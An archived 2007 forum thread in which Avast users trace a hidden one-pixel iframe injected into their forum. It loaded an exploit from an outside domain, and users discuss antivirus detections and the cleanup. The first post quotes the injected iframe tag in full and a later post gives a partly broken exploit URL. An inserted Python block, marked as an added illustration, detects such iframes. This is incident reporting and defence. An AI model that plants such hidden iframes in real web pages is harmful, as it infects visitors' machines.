Avast WEBforum

Other => General Topics => Topic started by: DavidR on August 24, 2007, 11:46:03 PM

Title: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: DavidR on August 24, 2007, 11:46:03 PM
I have been experiencing a problem posting replies to topics in that, instead of the topic being displayed with the new post added, it hangs in mid post, or that is what it appears to do. If I go back and refresh the topic I can see the post I added.

When this hang happens I saw a 1 pixel square at the top left of the screen and it would appear that there is another script running from mediacount, in the form of an iFrame 1 pixel X 1 pixel. I had noticed this square in previous pages but didn't twig what it was.

Code:
<iframe src='http://mediacount.net/strong/020sdsfg' width=1 height=1></iframe>

I don't know what the consequences of placing an iFrame outside of the body/head of a W3C standard page would be.

This I believe is happening because I have noscript and firefox, and because this is a new addition to avast pages, I have only allowed avast.com and google-analytics.com and not mediacount.net. It took ages to find this and trying to add mediacount.net is proving to be difficult.

Is anyone else experiencing this problem or noticing the 1 pixel square at the top left of pages ?

So what is avast using mediacount.net for and why use an iFrame tag, which is notorious for introducing malware into systems as it can run scripts with user input ?
This use of an iFrame tag on what is a security based web site I feel is a big mistake.

Edit: Looks like this mention of the iframe and malware exploit proved to be very accurate (see images below).
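
As an added illustration of what the post above describes (not part of the original thread): a Python check that audits page source for iframes that are 1x1, point at a host outside an allowlist, or sit outside <body>. The allowlist contents, the sample page and the placeholder host counter.example.net are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts the forum may embed (the post's NoScript allowlist).
ALLOWED_HOSTS = {"avast.com", "google-analytics.com"}

# Constructed sample page; counter.example.net is a placeholder host.
SAMPLE = """<html><head><title>Forum</title></head>
<body>
<iframe src="http://www.avast.com/banner" width="468" height="60"></iframe>
</body></html>
<iframe src='http://counter.example.net/x/abc' width=1 height=1></iframe>
"""

def host_allowed(host, allowed=ALLOWED_HOSTS):
    """True if host is an allowed domain or a subdomain of one."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in allowed)

def is_tiny(value):
    """True for a width/height of 0 or 1, with or without a px suffix."""
    v = (value or "").strip().lower().replace("px", "")
    return v.isdigit() and int(v) <= 1

class FrameAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.in_body = False
        self.findings = []  # (line, host, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag == "body":
            self.in_body = True
        elif tag == "iframe":
            a = dict(attrs)
            host = urlparse(a.get("src") or "").hostname
            checks = [
                (bool(host) and not host_allowed(host), "off-allowlist host"),
                (is_tiny(a.get("width")) and is_tiny(a.get("height")), "1x1 or smaller"),
                (not self.in_body, "outside <body>"),
            ]
            reasons = [label for hit, label in checks if hit]
            if reasons:
                self.findings.append((self.getpos()[0], host, reasons))

    def handle_endtag(self, tag):
        if tag == "body":
            self.in_body = False

def audit(html):
    parser = FrameAuditor()
    parser.feed(html)
    parser.close()
    return parser.findings
```

Run against the rendered HTML the server actually sends (not the template), since an injected tag like the one above only shows up in the served output.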
Title: Re: What does the forum use mediacount.net for ?
Post by: DavidR on August 25, 2007, 12:00:36 AM
This is what the screen looks like with the 1 pixel iFrame if experiencing this problem.

If the hang occurs the URL in the window is where it hangs.

Edit: The images I tried to attach failed because the malware iframe screwed with the attachments and they don't display so I have removed 1-pixel.gif and 1-pixel-hang.gif to avoid anyone trying to load them.
Title: Re: What does the forum use mediacount.net for ?
Post by: DavidR on August 25, 2007, 12:10:26 AM
There also seems to be a further problem in that the attached images don't display either.

So since this mediacount.net iFrame it has screwed my forum use with the Babylon theme, making it almost impossible to use the forum not knowing if the post was successful. Not very useful when you post about 20 posts a day.
Title: Re: What does the forum use mediacount.net for ?
Post by: DavidR on August 25, 2007, 12:25:03 AM
Test, with NoScript disabled.

Edit: absolutely no change with NoScript disabled. I have no idea what is going on since this iFrame for mediacount.net has been added but it totally screws me up.
Title: Re: What does the forum use mediacount.net for ?
Post by: DavidR on August 25, 2007, 12:58:03 AM
Well, I guess I found out a little more: it would appear that the iFrame is a malware infestation on the forums. I wondered why it was lonely on the forums.

(http://img.photobucket.com/albums/v325/for-dwr/mediacount-net.gif)

This is the link the iFrame goes to and DrWeb link scanner reports Exploit.ANIFile
http[break]://[break] mediacount.net/strong/020sdsfg/324123.htm

(http://img.photobucket.com/albums/v325/for-dwr/mediacount-ani-exploit.gif)
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: DavidR on August 25, 2007, 01:18:29 AM
Wow, it's lonely on here, I have just looked at the recent posts and I'm the only one soldiering on with 10 out of the last 12 posts since 6 p.m. UK local time.

I have reported the forum as infected to virus @ avast . com, let's hope it is resolved quickly.
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: Lisandro on August 25, 2007, 03:12:27 AM
Seems it's working now... testing...
Edited: the page does not come back to the same topic but to an empty page... strange. Look at the active tab in Firefox...
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: Lisandro on August 25, 2007, 03:38:50 AM
I can't quote...
The page does not come back to the original thread but to a blank page...
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: MFB on August 25, 2007, 06:51:15 AM
I noticed the 1x1 pixel square whenever I log in. I had mediacount.net disabled by No-Script but when I disable No-Script, I still see the square as well.   :-\

Wilders are also talking about it here (http://www.wilderssecurity.com/showthread.php?s=f721035386a80fb891bb8a6fa38ea774&t=183634)
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: Tarq57 on August 25, 2007, 07:04:35 AM
Well, I'm glad I read these posts. Have been unable to log on in Firefox, and when I attempt in IE7, Avast AV blocks the page from loading. Ironic.
Strange. Just noticed I am logged on. Just got a pixel before.
Also unable to modify profile.

Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: kubecj on August 26, 2007, 12:05:47 AM
I have no idea how this was able to come through. I removed that, upgraded to latest version, will investigate.

How would the person know I'm _far_ away from my computer?  ::)
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: DavidR on August 26, 2007, 12:25:42 AM
Firefox by all accounts isn't vulnerable to this attack, even with noscript disabled. When I experienced the page problem I checked the page source in trying to track the problem and saw the iframe tag. At first I just thought the forums was using it to gather page visited data, etc. and thought it a crazy method to do it.

However, when I tried using Avant, an IE clone, Web Shield alerted. So I twigged the site had been infected, so I sent a report to avast.

These were the two images I tried to attach earlier that failed.

It would be interesting to know if this was purely a security failing of SMC 1.1.2 as I found several such issues on the Simple Machines forums and they were also using 1.1.2 but it seemed they also had a weakness in their webhosting service.
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: bob3160 on August 26, 2007, 12:57:27 AM
Here is what I got yesterday:
(http://img.photobucket.com/albums/v190/bob3160/ShellFTP/finjan-fp.png)

and most of today, I was greeted with the following:

(http://img.photobucket.com/albums/v190/bob3160/ShellFTP/ForumMaintenance.png)

Glad the forum is back but would like an explanation.  :)
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: news on August 26, 2007, 12:59:58 AM
Quote
I have no idea how this was able to come through. I removed that, upgraded to latest version, will investigate.

How would the person know I'm _far_ away from my computer?  ::)

Well I'm glad you're close to your computer..now.   :)
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: Lisandro on August 26, 2007, 01:08:09 AM
Quote
How would the person know I'm _far_ away from my computer?  ::)
Inside information? ;D
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: Tarq57 on August 26, 2007, 02:28:56 AM
A forum member at Wilders suggested it would be a good idea for the Avast forum admin to send a mass email to all the forum users briefly explaining what happened, and offering the appropriate reassurance. (Or not  ;))
I agree with that thinking.
http://www.wilderssecurity.com/showthread.php?t=183634&page=3
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: bob3160 on August 26, 2007, 02:50:48 AM
An explanation in this Forum or on the Alwil website should be sufficient.  :)
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: Lisandro on August 26, 2007, 03:51:57 AM
Quote
A forum member at Wilders suggested it would be a good idea for the Avast forum admin to send a mass email to all the forum users briefly explaining what happened, and offering the appropriate reassurance. (Or not  ;))
I agree with that thinking.
I think like Bob. I'd rather an explanation (what was compromised by the exploit: our emails, our personal forum data, the posts themselves...) than a spam hysteria.
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: mauserme on August 26, 2007, 05:02:29 AM
Glad things are up and running again.  And rather quickly, I think.

I'll also cast a vote in favor of an explanation - not so much of what happened.  That's rather obvious.  But the ramifications, the lasting effects ...
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: MikeBCda on August 26, 2007, 05:29:05 AM
I never did get any malware warning, but I did get weird behavior here last night and this morning that, given the (coincidental?) timing, could very well have been tied into the same thing.

If I attempted to mark a forum as read, or in some cases simply returned to a forum after reading a topic, I got an error message to the effect that session verification had failed, try logging out and back in again.  But hitting the log-out button simply gave me the same error and left me logged in.

Whatever happened, it's nice to see everything's back up and running normally again.
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: Lisandro on August 26, 2007, 05:42:58 AM
I'm still experiencing deep lags using avast + Firefox + Comodo.
The lag does not occur so deeply if I browse with Opera.
The lag disappears if I browse with Opera and WebShield disabled.
It's becoming a mystery...
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: mauserme on August 26, 2007, 05:47:55 AM
I'm OK so far with Avant (an IE shell).

Yesterday I couldn't log in in Avant, Opera, or Firefox.  I kept getting an incorrect password error.  Couldn't create a new account either.
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: MikeBCda on August 26, 2007, 06:18:15 AM
Quote
I'm still experiencing deep lags using avast + Firefox + Comodo.
The lag does not occur so deeply if I browse with Opera.
The lag disappears if I browse with Opera and WebShield disabled.
It's becoming a mystery...

Odd ... if by Comodo you mean the firewall, I'm having no problems at all with the same combination (on dialup).

Maybe while you were sleeping, Brazil got moved to another planet so you now have a teensy bit of transmission lag?  ;)
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: Tarq57 on August 26, 2007, 06:32:42 AM
Quote
An explanation in this Forum or on the Alwil website should be sufficient.  :)
Ok, agree with that, too. Don't mind which form it takes. p'raps a forum announcement would be preferable.
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: FreewheelinFrank on August 26, 2007, 07:53:51 AM
Firefox users may have been exposed to malware not detected by avast. I picked this up in my Firefox cache:

(The malware was still infecting the Google cache of the forum as of yesterday evening.)

Antivirus     Version     Last Update     Result
AhnLab-V3   2007.8.25.0   2007.08.24   -
AntiVir   7.4.1.63   2007.08.25   HTML/Shellcode.Gen
Authentium   4.93.8   2007.08.25   -
Avast   4.7.1029.0   2007.08.25   -
AVG   7.5.0.484   2007.08.25   -
BitDefender   7.2   2007.08.26   -
CAT-QuickHeal   9.00   2007.08.25   -
ClamAV   0.91   2007.08.26   -
DrWeb   4.33   2007.08.26   VBS.Psyme.443
eSafe   7.0.15.0   2007.08.23   -
eTrust-Vet   31.1.5085   2007.08.24   -
Ewido   4.0   2007.08.25   Downloader.Psyme.kt
FileAdvisor   1   2007.08.26   -
Fortinet   2.91.0.0   2007.08.26   VBS/Agent.U!tr.dldr
F-Prot   4.3.2.48   2007.08.25   -
F-Secure   6.70.13030.0   2007.08.24   -
Ikarus   T3.1.1.12   2007.08.26   -
Kaspersky   4.0.2.24   2007.08.26   -
McAfee   5105   2007.08.24   -
Microsoft   1.2803   2007.08.26   -
NOD32v2   2484   2007.08.25   -
Norman   5.80.02   2007.08.24   -
Panda   9.0.0.4   2007.08.25   -
Prevx1   V2   2007.08.26   -
Rising   19.37.61.00   2007.08.26   -
Sophos   4.21.0   2007.08.25   Mal/JSShell-C
Sunbelt   2.2.907.0   2007.08.25   -
Symantec   10   2007.08.26   -
TheHacker   6.1.8.173   2007.08.26   -
VBA32   3.12.2.3   2007.08.26   -
VirusBuster   4.3.26:9   2007.08.25   -
Webwasher-Gateway   6.0.1   2007.08.26   Script.Shellcode.Gen

Seems to be an exploit so users of up-to-date Firefox were not at risk.

Still, a scan with Ewido/CureIT! might be in order.

EDIT: The write-up for this malware only states: 'Exploits system or software vulnerabilities', so I'm not sure if it was specifically aimed at Firefox. If it's a VBS as DrWeb and Fortinet suggest, it might also have been aimed at IE. Don't know why I found this one and not the ANI exploit.

http://www.sophos.com/security/analyses/maljsshellc.html
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: Kilia on August 26, 2007, 09:28:21 AM
My goodness!  Seems I missed all the fun here lately!

Glad that things are working ok now though and good job getting rid of the culprit.
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: polonus on August 26, 2007, 12:07:52 PM
Hello malware fighters,

Do not give it too much attention. That is always the best policy. If no one was actually compromised. Again strange because this Iframe hacking in combination with a Storm worm variant happened to various other forums in 2004. It also happened to the site of The Register in the U.K. as I remember. So a security company should be aware of these things threatening their very forums.
On the other hand we could say that the very in browser security is far from ideal. If only script could be sandboxed really secure and this was brought in by default inside all kinds of browsers, script kiddies and malware authors would not welcome that day. Hell no, they would have a troublesome time when NoScript was on in browsers for instance to launch their malicious attacks. But others would not welcome this very much because it would hamper their silent profiling, tracking and monitoring for whatever reason you could imagine. This is in a few words the actual crux of the big divide between easy and commercially interesting and secure and consumer friendly. So all solutions taken are still far from definitive, and the user has to bring in his own forms of protection, as you think of it really a shame.

polonus
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: essexboy on August 26, 2007, 01:29:51 PM
I had the same problem on Friday. I got a web shield warning and IE7 came up with a request for a remote connection Active-x to run, to which I obviously said get lost. I did a full check afterwards and was clean, so my security and webshield worked.
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: DavidR on August 26, 2007, 01:41:52 PM
Quote
Firefox users may have been exposed to malware not detected by avast. I picked this up in my Firefox cache:
<snip>
Seems to be an exploit so users of up-to-date Firefox were not at risk.

Still, a scan with Ewido/CureIT! might be in order.
<snip>

I found that in my firefox cache too, when I ran avg-as scan afterwards. I have to admit I didn't check the creation date and time. I also did a VT scan and sent the sample to avast.

Now perhaps people will realise how powerful iframe tags can be when so many are used in emails. Hence the avast suspect alerts when found in emails.
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: Lisandro on August 26, 2007, 03:09:15 PM
Quote
So a security company should be aware of these things threatening their very forums.
Hmmm... what happened then? Do they sleep?
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: bob3160 on August 26, 2007, 05:29:57 PM
Quote
Do not give it too much attention. That is always the best policy.
Sticking your head in the sand and making believe nothing happened is never a good policy. IMHO
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: Vlk on August 26, 2007, 06:19:01 PM
No one's sticking anything anywhere. Please see the other thread.

Cheers
Vlk
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: bob3160 on August 26, 2007, 06:35:49 PM
Quote
Guys,

I'm also still waiting for a detailed explanation of what actually took place. All I know is that the scum took advantage of a vulnerability in SMF 1.1.12 (that was installed on the server). Kubecj (our web admin) is out of the country but we were able to have him fix the issue yesterday late night. He should be coming home tonight so I hope I (and you, too) will get a satisfactory explanation soon.

Thanks
Vlk
Thanks Vlk  :)
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: news on August 26, 2007, 06:38:30 PM
bob3160...

Have a blessed Sunday...it is Sunday after all. ;)

Peace
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: bob3160 on August 26, 2007, 06:40:57 PM
Quote
bob3160...

Have a blessed Sunday...it is Sunday after all. ;)

Peace
Thanks, you too.  :)
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: polonus on August 26, 2007, 11:29:30 PM
Hi bob3160,

I did not mean that there should not be an analysis of the facts to better prevent this for the future, of course that is appropriate. I just meant to say: do not make it bigger than it is, because the people that do these things do this just because of that reason. That was all that I meant to say in my previous posting.

polonus
Title: Re: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?
Post by: essexboy on August 26, 2007, 11:32:25 PM
I would concur, Pol. I mean, webshield stopped it.